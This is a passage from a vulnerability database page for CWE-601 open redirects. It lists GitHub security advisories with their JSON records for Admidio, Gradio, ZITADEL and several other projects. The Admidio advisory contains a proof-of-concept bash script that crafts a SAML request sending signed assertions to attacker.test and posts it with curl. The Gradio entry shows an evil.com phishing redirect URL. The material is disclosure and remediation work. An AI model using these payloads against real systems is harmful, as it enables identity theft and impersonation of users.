CWE-601
AllowedURL Redirection to Untrusted Site ('Open Redirect')
Abstraction: Base · Status: Draft
The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.
2307 vulnerabilities reference this CWE, most recent first.
GHSA-P9W9-87C8-M235
Vulnerability from github – Published: 2026-04-29 21:57 – Updated: 2026-05-08 20:14Summary
The SAML IdP implementation in Admidio's SSO module uses the AssertionConsumerServiceURL value directly from incoming SAML AuthnRequest messages as the destination for the SAML response, without validating it against the registered ACS URL (smc_acs_url) stored in the database for the corresponding service provider client. An attacker who knows the Entity ID of a registered SP client can craft a SAML AuthnRequest with an arbitrary AssertionConsumerServiceURL, causing the IdP to send the signed SAML response -- containing user identity attributes (login name, email, roles, profile fields) -- to an attacker-controlled URL.
Details
The vulnerability is in src/SSO/Service/SAMLService.php, in handleSSORequest() at lines 439-465:
// Line 439: ACS URL extracted directly from the AuthnRequest (attacker-controlled)
$clientACS = $request->getAssertionConsumerServiceURL();
// ...
// Line 456: Used as the Destination of the SAML Response
$response->setDestination($clientACS);
// Lines 463-465: Also used as the Recipient in SubjectConfirmationData
$subjectConfirmationData = new \LightSaml\Model\Assertion\SubjectConfirmationData();
$subjectConfirmationData
->setRecipient($clientACS) // Required recipient URL
There is no code that compares $clientACS against the client's registered smc_acs_url column value. The SAML 2.0 specification and OASIS security considerations explicitly require IdPs to verify that the AssertionConsumerServiceURL matches one of the SP's registered ACS endpoints.
Signature validation is conditional and does not prevent this attack:
At lines 417-419:
if ($client->getValue('smc_require_auth_signed') || $client->getValue('smc_validate_signatures')) {
$this->validateSignature($client, $request, $client->getValue('smc_require_auth_signed'));
}
If neither smc_require_auth_signed nor smc_validate_signatures is enabled for the SP client (which is the default when creating a new client), the AuthnRequest is processed without any signature verification. This means an attacker only needs to know the SP's Entity ID (which is often publicly discoverable from the SP's metadata endpoint) to craft a malicious AuthnRequest.
Even when signatures ARE validated, the ACS URL should still be checked against the registered value, because: - Signature validation proves the request came from the SP, not that the ACS URL is authorized - If the SP's signing key is compromised, the ACS URL becomes the last line of defense - This follows the defense-in-depth principle mandated by SAML 2.0 Profiles Section 4.1.4.1
The same pattern exists in the error response path at lines 323-326:
} elseif (method_exists($request, 'getAssertionConsumerServiceURL')) {
$response->setDestination($request->getAssertionConsumerServiceURL());
} else {
$response->setDestination($client->getValue('smc_acs_url'));
}
Attack flow:
1. Attacker discovers the Entity ID of a SAML client registered in Admidio (e.g., from the SP's public metadata)
2. Attacker crafts a SAML AuthnRequest with the legitimate Entity ID but an attacker-controlled AssertionConsumerServiceURL
3. Attacker sends this AuthnRequest to Admidio's SSO endpoint (via redirect or auto-submitting form)
4. If the user is already logged in to Admidio, the IdP generates a signed SAML response with the user's identity and attributes
5. The SAML response is POST-binding-sent to the attacker's URL via an auto-submitting HTML form rendered in the victim's browser
6. The attacker receives the signed SAML assertion containing login name, email, full name, roles, and other profile fields
7. The attacker can replay this SAML assertion to the legitimate SP (since it is validly signed by the IdP)
PoC
# Step 1: Generate a malicious SAML AuthnRequest
# This is a base64-encoded SAML AuthnRequest with:
# - Issuer = the known Entity ID of a registered SP
# - AssertionConsumerServiceURL = attacker's server
# Example AuthnRequest XML (before base64 encoding):
# <samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
# xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
# ID="_test123"
# Version="2.0"
# IssueInstant="2026-03-17T00:00:00Z"
# AssertionConsumerServiceURL="https://attacker.test/steal-saml"
# ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST">
# <saml:Issuer>https://legitimate-sp.test/metadata</saml:Issuer>
# </samlp:AuthnRequest>
SAML_REQUEST=$(echo -n '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_test123" Version="2.0" IssueInstant="2026-03-17T00:00:00Z" AssertionConsumerServiceURL="https://attacker.test/steal-saml" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"><saml:Issuer>REGISTERED_SP_ENTITY_ID</saml:Issuer></samlp:AuthnRequest>' | base64 -w 0)
# Step 2: Send via HTTP-POST binding to Admidio's SSO endpoint
# (This would typically be done by tricking a logged-in user to visit a page with an auto-submitting form)
curl -X POST "https://TARGET/modules/sso/index.php/saml/sso" \
-d "SAMLRequest=$SAML_REQUEST" \
-b "ADMIDIO_SESSION=victim_session_cookie"
# Step 3: If the victim is logged in, Admidio will render an auto-submitting HTML form
# that POSTs the signed SAML Response to https://attacker.test/steal-saml
# The response contains: user login name, email, full name, roles, and any other
# profile fields configured in the SP's field mapping
# Step 4: Attacker receives the signed SAML assertion and can replay it
# to the legitimate SP to authenticate as the victim
Impact
- User Identity Theft: The signed SAML assertion containing login credentials, email, name, and roles is sent to an attacker-controlled URL. The attacker can replay this assertion to the legitimate SP to impersonate the victim.
- Information Disclosure: User profile data (email, phone, address, role memberships, and any custom profile fields configured in the SP's field mapping) is exfiltrated.
- Scope Change (S:C): The IdP vulnerability directly enables impersonation on separate Service Provider applications.
- No Signature Required: When
smc_require_auth_signedis not enabled (default), the attack requires zero knowledge of cryptographic keys -- only the SP's Entity ID.
Recommended Fix
Validate the AssertionConsumerServiceURL from the AuthnRequest against the registered smc_acs_url before using it. In src/SSO/Service/SAMLService.php, add validation after loading the client:
// After line 439: $clientACS = $request->getAssertionConsumerServiceURL();
// Validate ACS URL against registered client configuration
$registeredACS = $client->getValue('smc_acs_url');
if (!empty($clientACS) && $clientACS !== $registeredACS) {
throw new Exception(
'The AssertionConsumerServiceURL in the AuthnRequest ("' . $clientACS . '") ' .
'does not match the registered ACS URL for this client. ' .
'Possible assertion theft attempt.'
);
}
// If no ACS URL in request, fall back to the registered one
if (empty($clientACS)) {
$clientACS = $registeredACS;
}
Also apply the same validation in the errorResponse() method at line 323-326:
// Replace lines 323-326 with:
if ($request instanceof LogoutRequest) {
$response->setDestination($client->getValue('smc_slo_url'));
} else {
// Always use the registered ACS URL, never the request's ACS URL
$response->setDestination($client->getValue('smc_acs_url'));
}
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.0.8"
},
"package": {
"ecosystem": "Packagist",
"name": "admidio/admidio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.0.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41670"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-29T21:57:30Z",
"nvd_published_at": "2026-05-07T04:16:30Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe SAML IdP implementation in Admidio\u0027s SSO module uses the `AssertionConsumerServiceURL` value directly from incoming SAML AuthnRequest messages as the destination for the SAML response, without validating it against the registered ACS URL (`smc_acs_url`) stored in the database for the corresponding service provider client. An attacker who knows the Entity ID of a registered SP client can craft a SAML AuthnRequest with an arbitrary `AssertionConsumerServiceURL`, causing the IdP to send the signed SAML response -- containing user identity attributes (login name, email, roles, profile fields) -- to an attacker-controlled URL.\n\n## Details\n\nThe vulnerability is in `src/SSO/Service/SAMLService.php`, in `handleSSORequest()` at lines 439-465:\n\n```php\n// Line 439: ACS URL extracted directly from the AuthnRequest (attacker-controlled)\n$clientACS = $request-\u003egetAssertionConsumerServiceURL();\n\n// ...\n\n// Line 456: Used as the Destination of the SAML Response\n$response-\u003esetDestination($clientACS);\n\n// Lines 463-465: Also used as the Recipient in SubjectConfirmationData\n$subjectConfirmationData = new \\LightSaml\\Model\\Assertion\\SubjectConfirmationData();\n$subjectConfirmationData\n -\u003esetRecipient($clientACS) // Required recipient URL\n```\n\nThere is no code that compares `$clientACS` against the client\u0027s registered `smc_acs_url` column value. The SAML 2.0 specification and OASIS security considerations explicitly require IdPs to verify that the AssertionConsumerServiceURL matches one of the SP\u0027s registered ACS endpoints.\n\n**Signature validation is conditional and does not prevent this attack:**\n\nAt lines 417-419:\n```php\nif ($client-\u003egetValue(\u0027smc_require_auth_signed\u0027) || $client-\u003egetValue(\u0027smc_validate_signatures\u0027)) {\n $this-\u003evalidateSignature($client, $request, $client-\u003egetValue(\u0027smc_require_auth_signed\u0027));\n}\n```\n\nIf neither `smc_require_auth_signed` nor `smc_validate_signatures` is enabled for the SP client (which is the default when creating a new client), the AuthnRequest is processed without any signature verification. This means an attacker only needs to know the SP\u0027s Entity ID (which is often publicly discoverable from the SP\u0027s metadata endpoint) to craft a malicious AuthnRequest.\n\nEven when signatures ARE validated, the ACS URL should still be checked against the registered value, because:\n- Signature validation proves the request came from the SP, not that the ACS URL is authorized\n- If the SP\u0027s signing key is compromised, the ACS URL becomes the last line of defense\n- This follows the defense-in-depth principle mandated by SAML 2.0 Profiles Section 4.1.4.1\n\n**The same pattern exists in the error response path** at lines 323-326:\n```php\n} elseif (method_exists($request, \u0027getAssertionConsumerServiceURL\u0027)) {\n $response-\u003esetDestination($request-\u003egetAssertionConsumerServiceURL());\n} else {\n $response-\u003esetDestination($client-\u003egetValue(\u0027smc_acs_url\u0027));\n}\n```\n\n**Attack flow:**\n1. Attacker discovers the Entity ID of a SAML client registered in Admidio (e.g., from the SP\u0027s public metadata)\n2. Attacker crafts a SAML AuthnRequest with the legitimate Entity ID but an attacker-controlled `AssertionConsumerServiceURL`\n3. Attacker sends this AuthnRequest to Admidio\u0027s SSO endpoint (via redirect or auto-submitting form)\n4. If the user is already logged in to Admidio, the IdP generates a signed SAML response with the user\u0027s identity and attributes\n5. The SAML response is POST-binding-sent to the attacker\u0027s URL via an auto-submitting HTML form rendered in the victim\u0027s browser\n6. The attacker receives the signed SAML assertion containing login name, email, full name, roles, and other profile fields\n7. The attacker can replay this SAML assertion to the legitimate SP (since it is validly signed by the IdP)\n\n## PoC\n\n```bash\n# Step 1: Generate a malicious SAML AuthnRequest\n# This is a base64-encoded SAML AuthnRequest with:\n# - Issuer = the known Entity ID of a registered SP\n# - AssertionConsumerServiceURL = attacker\u0027s server\n\n# Example AuthnRequest XML (before base64 encoding):\n# \u003csamlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\"\n# xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\"\n# ID=\"_test123\"\n# Version=\"2.0\"\n# IssueInstant=\"2026-03-17T00:00:00Z\"\n# AssertionConsumerServiceURL=\"https://attacker.test/steal-saml\"\n# ProtocolBinding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST\"\u003e\n# \u003csaml:Issuer\u003ehttps://legitimate-sp.test/metadata\u003c/saml:Issuer\u003e\n# \u003c/samlp:AuthnRequest\u003e\n\nSAML_REQUEST=$(echo -n \u0027\u003csamlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"_test123\" Version=\"2.0\" IssueInstant=\"2026-03-17T00:00:00Z\" AssertionConsumerServiceURL=\"https://attacker.test/steal-saml\" ProtocolBinding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST\"\u003e\u003csaml:Issuer\u003eREGISTERED_SP_ENTITY_ID\u003c/saml:Issuer\u003e\u003c/samlp:AuthnRequest\u003e\u0027 | base64 -w 0)\n\n# Step 2: Send via HTTP-POST binding to Admidio\u0027s SSO endpoint\n# (This would typically be done by tricking a logged-in user to visit a page with an auto-submitting form)\ncurl -X POST \"https://TARGET/modules/sso/index.php/saml/sso\" \\\n -d \"SAMLRequest=$SAML_REQUEST\" \\\n -b \"ADMIDIO_SESSION=victim_session_cookie\"\n\n# Step 3: If the victim is logged in, Admidio will render an auto-submitting HTML form\n# that POSTs the signed SAML Response to https://attacker.test/steal-saml\n# The response contains: user login name, email, full name, roles, and any other\n# profile fields configured in the SP\u0027s field mapping\n\n# Step 4: Attacker receives the signed SAML assertion and can replay it\n# to the legitimate SP to authenticate as the victim\n```\n\n## Impact\n\n- **User Identity Theft**: The signed SAML assertion containing login credentials, email, name, and roles is sent to an attacker-controlled URL. The attacker can replay this assertion to the legitimate SP to impersonate the victim.\n- **Information Disclosure**: User profile data (email, phone, address, role memberships, and any custom profile fields configured in the SP\u0027s field mapping) is exfiltrated.\n- **Scope Change (S:C)**: The IdP vulnerability directly enables impersonation on separate Service Provider applications.\n- **No Signature Required**: When `smc_require_auth_signed` is not enabled (default), the attack requires zero knowledge of cryptographic keys -- only the SP\u0027s Entity ID.\n\n## Recommended Fix\n\nValidate the `AssertionConsumerServiceURL` from the AuthnRequest against the registered `smc_acs_url` before using it. In `src/SSO/Service/SAMLService.php`, add validation after loading the client:\n\n```php\n// After line 439: $clientACS = $request-\u003egetAssertionConsumerServiceURL();\n\n// Validate ACS URL against registered client configuration\n$registeredACS = $client-\u003egetValue(\u0027smc_acs_url\u0027);\nif (!empty($clientACS) \u0026\u0026 $clientACS !== $registeredACS) {\n throw new Exception(\n \u0027The AssertionConsumerServiceURL in the AuthnRequest (\"\u0027 . $clientACS . \u0027\") \u0027 .\n \u0027does not match the registered ACS URL for this client. \u0027 .\n \u0027Possible assertion theft attempt.\u0027\n );\n}\n\n// If no ACS URL in request, fall back to the registered one\nif (empty($clientACS)) {\n $clientACS = $registeredACS;\n}\n```\n\nAlso apply the same validation in the `errorResponse()` method at line 323-326:\n\n```php\n// Replace lines 323-326 with:\nif ($request instanceof LogoutRequest) {\n $response-\u003esetDestination($client-\u003egetValue(\u0027smc_slo_url\u0027));\n} else {\n // Always use the registered ACS URL, never the request\u0027s ACS URL\n $response-\u003esetDestination($client-\u003egetValue(\u0027smc_acs_url\u0027));\n}\n```",
"id": "GHSA-p9w9-87c8-m235",
"modified": "2026-05-08T20:14:29Z",
"published": "2026-04-29T21:57:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-p9w9-87c8-m235"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41670"
},
{
"type": "PACKAGE",
"url": "https://github.com/Admidio/admidio"
},
{
"type": "WEB",
"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Admidio Sends SAML Response to Unvalidated Assertion Consumer Service URL from AuthnRequest"
}
GHSA-PC7G-8V63-Q7V6
Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-19 18:31A flaw has been found in busy up to 2.5.5. The affected element is an unknown function of the file source-code/busy-master/src/server/app.js of the component Callback Handler. Executing a manipulation of the argument state can lead to open redirect. It is possible to launch the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.
{
"affected": [],
"aliases": [
"CVE-2026-2709"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-19T07:17:50Z",
"severity": "MODERATE"
},
"details": "A flaw has been found in busy up to 2.5.5. The affected element is an unknown function of the file source-code/busy-master/src/server/app.js of the component Callback Handler. Executing a manipulation of the argument state can lead to open redirect. It is possible to launch the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.",
"id": "GHSA-pc7g-8v63-q7v6",
"modified": "2026-02-19T18:31:51Z",
"published": "2026-02-19T18:31:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2709"
},
{
"type": "WEB",
"url": "https://github.com/busyorg/busy/issues/2287"
},
{
"type": "WEB",
"url": "https://github.com/busyorg/busy/issues/2287#issue-3905518966"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.346661"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.346661"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.753299"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-PC86-JMJR-HVXG
Vulnerability from github – Published: 2022-05-24 19:06 – Updated: 2022-05-24 19:06GetSimpleCMS <=3.3.15 has an open redirect in admin/changedata.php via the redirect function to the url parameter.
{
"affected": [],
"aliases": [
"CVE-2020-18660"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-06-23T21:15:00Z",
"severity": "MODERATE"
},
"details": "GetSimpleCMS \u003c=3.3.15 has an open redirect in admin/changedata.php via the redirect function to the url parameter.",
"id": "GHSA-pc86-jmjr-hvxg",
"modified": "2022-05-24T19:06:02Z",
"published": "2022-05-24T19:06:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-18660"
},
{
"type": "WEB",
"url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1310"
},
{
"type": "WEB",
"url": "https://github.com/LoRexxar/CVE_Request/blob/master/getsimplecms%20v3.3.15/getsimplecms_before_v3.3.15.md"
},
{
"type": "WEB",
"url": "https://www.seebug.org/vuldb/ssvid-97928"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-PFJF-5GXR-995X
Vulnerability from github – Published: 2026-03-01 01:29 – Updated: 2026-06-06 00:22Summary
The _redirect_to_target() function in Gradio's OAuth flow accepts an unvalidated _target_url query parameter, allowing redirection to arbitrary external URLs. This affects the /logout and /login/callback endpoints on Gradio apps with OAuth enabled (i.e. apps running on Hugging Face Spaces with gr.LoginButton).
Details
def _redirect_to_target(request, default_target="/"):
target = request.query_params.get("_target_url", default_target)
return RedirectResponse(target) # No validation
An attacker can craft a URL like https://my-space.hf.space/logout?_target_url=https://evil.com/phishing that redirects the user to an external site after logout. Because the URL originates from a trusted hf.space domain, users are more likely to trust the link.
Impact
Phishing — an attacker can use the trusted domain to redirect users to a malicious site. No direct data exposure or server-side impact.
## Fix The _target_url parameter is now sanitized to only use the path, query, and fragment, stripping any scheme or host.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "gradio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28415"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-284",
"CWE-330",
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-01T01:29:12Z",
"nvd_published_at": "2026-02-27T22:16:24Z",
"severity": "MODERATE"
},
"details": "# Summary\n\nThe _redirect_to_target() function in Gradio\u0027s OAuth flow accepts an unvalidated _target_url query parameter, allowing redirection to arbitrary external URLs. This affects the /logout and /login/callback endpoints on Gradio apps with OAuth enabled (i.e. apps running on Hugging Face Spaces with gr.LoginButton).\n\n## Details\n\n```python\n\n def _redirect_to_target(request, default_target=\"/\"):\n target = request.query_params.get(\"_target_url\", default_target)\n return RedirectResponse(target) # No validation\n```\n An attacker can craft a URL like https://my-space.hf.space/logout?_target_url=https://evil.com/phishing that redirects the user to an external site after logout. Because the URL originates from a trusted hf.space domain, users are more likely to trust the link.\n\n## Impact\n\nPhishing \u2014 an attacker can use the trusted domain to redirect users to a malicious site. No direct data exposure or server-side impact.\n\n ## Fix\nThe _target_url parameter is now sanitized to only use the path, query, and fragment, stripping any scheme or host.",
"id": "GHSA-pfjf-5gxr-995x",
"modified": "2026-06-06T00:22:30Z",
"published": "2026-03-01T01:29:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-pfjf-5gxr-995x"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28415"
},
{
"type": "WEB",
"url": "https://github.com/gradio-app/gradio/commit/dfee0da06d0aa94b3c2684131e7898d5d5c1911e"
},
{
"type": "PACKAGE",
"url": "https://github.com/gradio-app/gradio"
},
{
"type": "WEB",
"url": "https://github.com/gradio-app/gradio/releases/tag/gradio%406.6.0"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/gradio/PYSEC-2026-65.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Gradio has an Open Redirect in its OAuth Flow"
}
GHSA-PFRF-9R5F-73F5
Vulnerability from github – Published: 2025-12-08 22:19 – Updated: 2026-03-09 15:47Summary
A potential vulnerability exists in ZITADEL's password reset mechanism in login V2. ZITADEL utilizes the Forwarded or X-Forwarded-Host header from incoming requests to construct the URL for the password reset confirmation link. This link, containing a secret code, is then emailed to the user.
Impact
If an attacker can manipulate these headers (e.g., via host header injection), they could cause ZITADEL to generate a password reset link pointing to a malicious domain controlled by the attacker. If the user clicks this manipulated link in the email, the secret reset code embedded in the URL can be captured by the attacker. This captured code could then be used to reset the user's password and gain unauthorized access to their account.
It's important to note that this specific attack vector is mitigated for accounts that have Multi-Factor Authentication (MFA) or Passwordless authentication enabled.
Affected Versions
Systems using the login UI (v2) and running one of the following versions are affected:
- v4.x: 4.0.0-rc.1 through 4.7.0
Patches
The vulnerability has been addressed in the latest release. The patch resolves the issue by correctly validating the X-Forwarded-Host and Forwarded headers against the instance custom and trusted domains.
Before you upgrade, ensure that:
- the ZITADEL_API_URL is set and is pointing to your instance, resp. system in multi-instance deployments.
- the HTTP host (or a x-forwarded-host) is passed in your reverse proxy to the login UI.
- a x-zitadel-instance-host (or x-zitadel-forward-host) is set in your reverse for multi-instance deployments. If you're running a single instance solution, you don't need to take any actions.
Patched versions: - 4.x: Upgrade to >=4.7.1
Workarounds
The recommended solution is to update ZITADEL to a patched version.
A ZITADEL fronting proxy can be configured to delete all forwarded header values or set it to the requested host before sending requests to ZITADEL self-hosted environments.
Questions
If you have any questions or comments about this advisory, please email us at security@zitadel.com
Credits
Thanks to Amit Laish – GE Vernova for finding and reporting the vulnerability.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/zitadel/zitadel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.80.0-v2.20.0.20251208091519-4c879b47334e"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/zitadel/zitadel"
},
"ranges": [
{
"events": [
{
"introduced": "1.83.4"
},
{
"last_affected": "1.87.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/zitadel/zitadel"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-rc.1"
},
{
"fixed": "4.7.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/zitadel/zitadel/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.80.0-v2.20.0.20251208091519-4c879b47334e"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-29067"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-08T22:19:38Z",
"nvd_published_at": "2026-03-07T15:15:54Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA potential vulnerability exists in ZITADEL\u0027s password reset mechanism in login V2. ZITADEL utilizes the Forwarded or X-Forwarded-Host header from incoming requests to construct the URL for the password reset confirmation link. This link, containing a secret code, is then emailed to the user.\n\n### Impact\n\nIf an attacker can manipulate these headers (e.g., via host header injection), they could cause ZITADEL to generate a password reset link pointing to a malicious domain controlled by the attacker. If the user clicks this manipulated link in the email, the secret reset code embedded in the URL can be captured by the attacker. This captured code could then be used to reset the user\u0027s password and gain unauthorized access to their account.\n\nIt\u0027s important to note that this specific attack vector is mitigated for accounts that have Multi-Factor Authentication (MFA) or Passwordless authentication enabled.\n\n### Affected Versions\n\nSystems using the login UI (v2) and running one of the following versions are affected:\n- **v4.x**: `4.0.0-rc.1` through `4.7.0`\n\n### Patches\n\nThe vulnerability has been addressed in the latest release. The patch resolves the issue by correctly validating the X-Forwarded-Host and Forwarded headers against the instance custom and trusted domains.\n\nBefore you upgrade, ensure that:\n- the `ZITADEL_API_URL` is set and is pointing to your instance, resp. system in multi-instance deployments.\n- the HTTP `host` (or a `x-forwarded-host`) is passed in your reverse proxy to the login UI.\n- a `x-zitadel-instance-host` (or `x-zitadel-forward-host`) is set in your reverse for multi-instance deployments. If you\u0027re running a single instance solution, you don\u0027t need to take any actions.\n\nPatched versions:\n- 4.x: Upgrade to \u003e=[4.7.1](https://github.com/zitadel/zitadel/releases/tag/v4.7.1)\n\n### Workarounds\n\nThe recommended solution is to update ZITADEL to a patched version.\n\nA ZITADEL fronting proxy can be configured to delete all forwarded header values or set it to the requested host before sending requests to ZITADEL self-hosted environments.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [security@zitadel.com](mailto:security@zitadel.com)\n\n### Credits\n\nThanks to Amit Laish \u2013 GE Vernova for finding and reporting the vulnerability.",
"id": "GHSA-pfrf-9r5f-73f5",
"modified": "2026-03-09T15:47:05Z",
"published": "2025-12-08T22:19:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-pfrf-9r5f-73f5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29067"
},
{
"type": "WEB",
"url": "https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96"
},
{
"type": "PACKAGE",
"url": "https://github.com/zitadel/zitadel"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "ZITADEL Vulnerable to Account Takeover Due to Improper Instance Validation in V2 Login"
}
GHSA-PFRV-63W8-Q7RQ
Vulnerability from github – Published: 2025-10-30 15:32 – Updated: 2025-10-30 17:12An open redirect vulnerability exists in Byaidu PDFMathTranslate v1.9.9 that allows attackers to craft URLs that cause the application to redirect users to arbitrary external websites via the file parameter to the /gradio_api endpoint. This vulnerability could be exploited for phishing attacks or to bypass security filters.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pdf2zh"
},
"versions": [
"1.9.9"
]
}
],
"aliases": [
"CVE-2025-50736"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-30T17:12:39Z",
"nvd_published_at": "2025-10-30T14:15:43Z",
"severity": "LOW"
},
"details": "An open redirect vulnerability exists in Byaidu PDFMathTranslate v1.9.9 that allows attackers to craft URLs that cause the application to redirect users to arbitrary external websites via the file parameter to the /gradio_api endpoint. This vulnerability could be exploited for phishing attacks or to bypass security filters.",
"id": "GHSA-pfrv-63w8-q7rq",
"modified": "2025-10-30T17:12:40Z",
"published": "2025-10-30T15:32:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50736"
},
{
"type": "PACKAGE",
"url": "https://github.com/Byaidu/PDFMathTranslate"
},
{
"type": "WEB",
"url": "https://github.com/fai1424/Vulnerability-Research/tree/main/CVE-2025-50736"
},
{
"type": "WEB",
"url": "https://hackmd.io/@fai1424/SJz7ttVWxe"
},
{
"type": "WEB",
"url": "https://pdf2zh.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Byaidu PDFMathTranslate vulnerable to open redirect"
}
GHSA-PFWG-RXF4-97C3
Vulnerability from github – Published: 2021-10-06 17:47 – Updated: 2022-06-01 22:01Apache Superset prior to 1.1.0 allowed for the creation of an external URL that could be malicious. By not checking user input for open redirects the URL shortener functionality would allow for a malicious user to create a short URL for a dashboard that could convince the user to click the link.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "superset"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.34.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "apache-superset"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-28125"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2021-10-06T14:11:38Z",
"nvd_published_at": "2021-04-27T10:15:00Z",
"severity": "MODERATE"
},
"details": "Apache Superset prior to 1.1.0 allowed for the creation of an external URL that could be malicious. By not checking user input for open redirects the URL shortener functionality would allow for a malicious user to create a short URL for a dashboard that could convince the user to click the link.",
"id": "GHSA-pfwg-rxf4-97c3",
"modified": "2022-06-01T22:01:45Z",
"published": "2021-10-06T17:47:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28125"
},
{
"type": "WEB",
"url": "https://github.com/apache/superset/commit/eb35b804acf4d84cb70d02743e04b8afebbee029"
},
{
